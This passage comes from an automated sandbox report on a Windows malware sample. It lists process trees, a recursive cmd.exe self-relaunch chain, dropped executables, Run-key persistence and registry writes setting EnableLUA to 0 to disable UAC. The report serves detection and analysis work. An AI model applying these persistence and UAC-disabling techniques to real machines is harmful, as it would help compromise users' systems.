4444	reg.exe
1724	reg.exe
3052	reg.exe
3224	reg.exe
4768	reg.exe
4432	reg.exe
2780	reg.exe
936	reg.exe
2200	reg.exe
4676	reg.exe
2944	reg.exe
3292	reg.exe
3344	reg.exe
776	reg.exe
1804	reg.exe
1108	reg.exe
4532	reg.exe
1804	reg.exe
4236	reg.exe
2920	reg.exe
5116	reg.exe
2368	reg.exe
3040	reg.exe
1804	reg.exe
2520	reg.exe
1192	reg.exe
3852	reg.exe
4804	reg.exe
2952	reg.exe
808	reg.exe
3852	reg.exe
2652	reg.exe
1660	reg.exe
1084	reg.exe
3688	reg.exe
4688	reg.exe
3340	reg.exe
584	reg.exe
3880	reg.exe
4740	reg.exe
752	reg.exe
1956	reg.exe
772	reg.exe
1016	reg.exe
4392	reg.exe
1828	reg.exe
4368	reg.exe
1296	reg.exe
3192	reg.exe
4224	reg.exe
1992	reg.exe
3620	reg.exe
4524	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
208	993d2674077cd5exeexeexeex.exe
208	993d2674077cd5exeexeexeex.exe
208	993d2674077cd5exeexeexeex.exe
208	993d2674077cd5exeexeexeex.exe
4432	993d2674077cd5exeexeexeex.exe
4432	993d2674077cd5exeexeexeex.exe
4432	993d2674077cd5exeexeexeex.exe
4432	993d2674077cd5exeexeexeex.exe
2428	cmd.exe
2428	cmd.exe
2428	cmd.exe
2428	cmd.exe
764	reg.exe
764	reg.exe
764	reg.exe
764	reg.exe
3016	993d2674077cd5exeexeexeex.exe
3016	993d2674077cd5exeexeexeex.exe
3016	993d2674077cd5exeexeexeex.exe
3016	993d2674077cd5exeexeexeex.exe
2804	Conhost.exe
2804	Conhost.exe
2804	Conhost.exe
2804	Conhost.exe
4536	993d2674077cd5exeexeexeex.exe
4536	993d2674077cd5exeexeexeex.exe
4536	993d2674077cd5exeexeexeex.exe
4536	993d2674077cd5exeexeexeex.exe
2116	Conhost.exe
2116	Conhost.exe
2116	Conhost.exe
2116	Conhost.exe
3076	Conhost.exe
3076	Conhost.exe
3076	Conhost.exe
3076	Conhost.exe
1660	993d2674077cd5exeexeexeex.exe
1660	993d2674077cd5exeexeexeex.exe
1660	993d2674077cd5exeexeexeex.exe
1660	993d2674077cd5exeexeexeex.exe
1956	993d2674077cd5exeexeexeex.exe
1956	993d2674077cd5exeexeexeex.exe
1956	993d2674077cd5exeexeexeex.exe
1956	993d2674077cd5exeexeexeex.exe
1608	993d2674077cd5exeexeexeex.exe
1608	993d2674077cd5exeexeexeex.exe
1608	993d2674077cd5exeexeexeex.exe
1608	993d2674077cd5exeexeexeex.exe
2860	cmd.exe
2860	cmd.exe
2860	cmd.exe
2860	cmd.exe
3400	Conhost.exe
3400	Conhost.exe
3400	Conhost.exe
3400	Conhost.exe
2000	reg.exe
2000	reg.exe
2000	reg.exe
2000	reg.exe
3904	reg.exe
3904	reg.exe
3904	reg.exe
3904	reg.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5036	xaMcwwYU.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe
5036	xaMcwwYU.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 208 wrote to memory of 5036	208	993d2674077cd5exeexeexeex.exe	83
PID 208 wrote to memory of 5036	208	993d2674077cd5exeexeexeex.exe	83
PID 208 wrote to memory of 5036	208	993d2674077cd5exeexeexeex.exe	83
PID 208 wrote to memory of 2752	208	993d2674077cd5exeexeexeex.exe	84
PID 208 wrote to memory of 2752	208	993d2674077cd5exeexeexeex.exe	84
PID 208 wrote to memory of 2752	208	993d2674077cd5exeexeexeex.exe	84
PID 208 wrote to memory of 4376	208	993d2674077cd5exeexeexeex.exe	85
PID 208 wrote to memory of 4376	208	993d2674077cd5exeexeexeex.exe	85
PID 208 wrote to memory of 4376	208	993d2674077cd5exeexeexeex.exe	85
PID 208 wrote to memory of 2716	208	993d2674077cd5exeexeexeex.exe	87
PID 208 wrote to memory of 2716	208	993d2674077cd5exeexeexeex.exe	87
PID 208 wrote to memory of 2716	208	993d2674077cd5exeexeexeex.exe	87
PID 208 wrote to memory of 4368	208	993d2674077cd5exeexeexeex.exe	90
PID 208 wrote to memory of 4368	208	993d2674077cd5exeexeexeex.exe	90
PID 208 wrote to memory of 4368	208	993d2674077cd5exeexeexeex.exe	90
PID 208 wrote to memory of 2944	208	993d2674077cd5exeexeexeex.exe	88
PID 208 wrote to memory of 2944	208	993d2674077cd5exeexeexeex.exe	88
PID 208 wrote to memory of 2944	208	993d2674077cd5exeexeexeex.exe	88
PID 208 wrote to memory of 4560	208	993d2674077cd5exeexeexeex.exe	89
PID 208 wrote to memory of 4560	208	993d2674077cd5exeexeexeex.exe	89
PID 208 wrote to memory of 4560	208	993d2674077cd5exeexeexeex.exe	89
PID 4376 wrote to memory of 4432	4376	cmd.exe	94
PID 4376 wrote to memory of 4432	4376	cmd.exe	94
PID 4376 wrote to memory of 4432	4376	cmd.exe	94
PID 4560 wrote to memory of 2912	4560	cmd.exe	96
PID 4560 wrote to memory of 2912	4560	cmd.exe	96
PID 4560 wrote to memory of 2912	4560	cmd.exe	96
PID 4432 wrote to memory of 3764	4432	993d2674077cd5exeexeexeex.exe	97
PID 4432 wrote to memory of 3764	4432	993d2674077cd5exeexeexeex.exe	97
PID 4432 wrote to memory of 3764	4432	993d2674077cd5exeexeexeex.exe	97
PID 4432 wrote to memory of 4768	4432	993d2674077cd5exeexeexeex.exe	102
PID 4432 wrote to memory of 4768	4432	993d2674077cd5exeexeexeex.exe	102
PID 4432 wrote to memory of 4768	4432	993d2674077cd5exeexeexeex.exe	102
PID 4432 wrote to memory of 4048	4432	993d2674077cd5exeexeexeex.exe	101
PID 4432 wrote to memory of 4048	4432	993d2674077cd5exeexeexeex.exe	101
PID 4432 wrote to memory of 4048	4432	993d2674077cd5exeexeexeex.exe	101
PID 4432 wrote to memory of 4736	4432	993d2674077cd5exeexeexeex.exe	100
PID 4432 wrote to memory of 4736	4432	993d2674077cd5exeexeexeex.exe	100
PID 4432 wrote to memory of 4736	4432	993d2674077cd5exeexeexeex.exe	100
PID 4432 wrote to memory of 3076	4432	993d2674077cd5exeexeexeex.exe	99
PID 4432 wrote to memory of 3076	4432	993d2674077cd5exeexeexeex.exe	99
PID 4432 wrote to memory of 3076	4432	993d2674077cd5exeexeexeex.exe	99
PID 3764 wrote to memory of 2428	3764	cmd.exe	107
PID 3764 wrote to memory of 2428	3764	cmd.exe	107
PID 3764 wrote to memory of 2428	3764	cmd.exe	107
PID 3076 wrote to memory of 4408	3076	cmd.exe	108
PID 3076 wrote to memory of 4408	3076	cmd.exe	108
PID 3076 wrote to memory of 4408	3076	cmd.exe	108
PID 2428 wrote to memory of 1496	2428	cmd.exe	191
PID 2428 wrote to memory of 1496	2428	cmd.exe	191
PID 2428 wrote to memory of 1496	2428	cmd.exe	191
PID 2428 wrote to memory of 1296	2428	cmd.exe	111
PID 2428 wrote to memory of 1296	2428	cmd.exe	111
PID 2428 wrote to memory of 1296	2428	cmd.exe	111
PID 2428 wrote to memory of 1428	2428	cmd.exe	112
PID 2428 wrote to memory of 1428	2428	cmd.exe	112
PID 2428 wrote to memory of 1428	2428	cmd.exe	112
PID 2428 wrote to memory of 1840	2428	cmd.exe	118
PID 2428 wrote to memory of 1840	2428	cmd.exe	118
PID 2428 wrote to memory of 1840	2428	cmd.exe	118
PID 2428 wrote to memory of 2368	2428	cmd.exe	113
PID 2428 wrote to memory of 2368	2428	cmd.exe	113
PID 2428 wrote to memory of 2368	2428	cmd.exe	113
PID 1496 wrote to memory of 764	1496	Conhost.exe	186

System policy modification 1 TTPs 32 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	993d2674077cd5exeexeexeex.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	993d2674077cd5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	993d2674077cd5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	993d2674077cd5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	993d2674077cd5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	993d2674077cd5exeexeexeex.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	993d2674077cd5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	993d2674077cd5exeexeexeex.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	993d2674077cd5exeexeexeex.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	993d2674077cd5exeexeexeex.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	cscript.exe

C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
"C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe"
1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:208
- C:\Users\Admin\uCcEIEgg\xaMcwwYU.exe
  "C:\Users\Admin\uCcEIEgg\xaMcwwYU.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in System32 directory
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  PID:5036
- C:\ProgramData\BgUYMIss\EgooQIMk.exe
  "C:\ProgramData\BgUYMIss\EgooQIMk.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:2752
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4376
- - C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
    C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4432
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3764
    - - C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        5⤵
        
        PID:2428
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        6⤵
        
        PID:1496
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        7⤵
        
        PID:764
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        8⤵
        
        PID:4656
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3016
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        10⤵
        
        PID:1652
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        11⤵
        
        PID:2804
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        12⤵
        
        PID:4464
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        13⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4536
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        14⤵
        
        PID:3636
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        15⤵
        
        PID:2116
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        16⤵
        
        PID:3340
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        17⤵
        
        PID:3076
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        18⤵
        
        PID:4960
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        19⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1660
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        20⤵
        
        PID:1744
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        21⤵
        UAC bypass
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        System policy modification
        
        PID:1956
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        22⤵
        
        PID:4316
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        23⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1608
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        24⤵
        
        PID:1644
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        25⤵
        
        PID:2860
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        26⤵
        
        PID:4560
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        27⤵
        
        PID:3400
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        28⤵
        
        PID:4460
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        29⤵
        
        PID:2000
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        30⤵
        
        PID:2384
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        31⤵
        
        PID:3904
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        32⤵
        
        PID:708
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        33⤵
        
        PID:3008
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        34⤵
        
        PID:4364
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        35⤵
        
        PID:4376
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        36⤵
        
        PID:1092
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        37⤵
        
        PID:3256
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        38⤵
        
        PID:1632
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        39⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3400
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        39⤵
        
        PID:1220
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        40⤵
        
        PID:4044
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        41⤵
        
        PID:2200
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        42⤵
        
        PID:724
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        43⤵
        
        PID:1192
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        44⤵
        
        PID:4636
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        45⤵
        
        PID:2572
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        46⤵
        
        PID:316
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        47⤵
        
        PID:1720
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        48⤵
        
        PID:4396
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        49⤵
        
        PID:4784
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        50⤵
        
        PID:644
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        51⤵
        
        PID:4632
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        52⤵
        
        PID:496
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        53⤵
        
        PID:2076
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        53⤵
        
        PID:4212
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        54⤵
        
        PID:552
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        55⤵
        
        PID:2952
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        56⤵
        UAC bypass
        Checks whether UAC is enabled
        System policy modification
        
        PID:4404
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        57⤵
        
        PID:704
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        58⤵
        
        PID:4548
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        59⤵
        
        PID:5052
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        60⤵
        
        PID:3060
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        61⤵
        
        PID:5068
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        62⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4740
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        63⤵
        
        PID:4860
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        64⤵
        
        PID:964
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        65⤵
        
        PID:4948
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        66⤵
        
        PID:4940
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        67⤵
        
        PID:752
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        68⤵
        
        PID:4564
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        69⤵
        
        PID:3960
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        70⤵
        
        PID:404
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        71⤵
        
        PID:4640
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex"
        72⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe
        
        C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex
        73⤵
        
        PID:4072
        
        C:\Windows\SysWOW64\cmd.exe
        
